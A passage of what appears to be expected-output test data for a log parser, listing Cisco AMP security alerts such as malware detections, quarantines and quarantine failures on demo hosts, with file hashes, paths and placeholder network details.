"host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25859, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:49:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 562000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583853374897127000, + "event.kind": 
"alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 26979, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 496121997, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043963, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27909, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": 
"2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 498576872, + "event.action": "Multiple Infected Files", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043964, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29220, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:28:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533671595485954049", + 
"cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 440000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671599780921000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 30538, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:28:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.FCE5B6784D-100.SBX.TG", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 899000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671595485954000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": 
"5df0c4ebca109779dc8afc745d612637", + "file.hash.sha1": "bdb11107a33eaeded6a838eb2a0e6167637dbe9c", + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "file.name": "pp32.exe", + "file.path": "\\\\?\\C:\\pp32.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 31671, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "5df0c4ebca109779dc8afc745d612637", + "bdb11107a33eaeded6a838eb2a0e6167637dbe9c" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 453000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": 
"Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 32991, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 437000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": 
[ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 35457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": 
"6419179213462437901", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 361000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36650, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 37836, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 797000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + 
"log.offset": 39029, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40302, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 
"10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503301", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41422, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437902", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 893000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 42542, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437899", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 456000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503299", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45179, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470602", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 957000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 46299, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179209167470598", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47663, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": 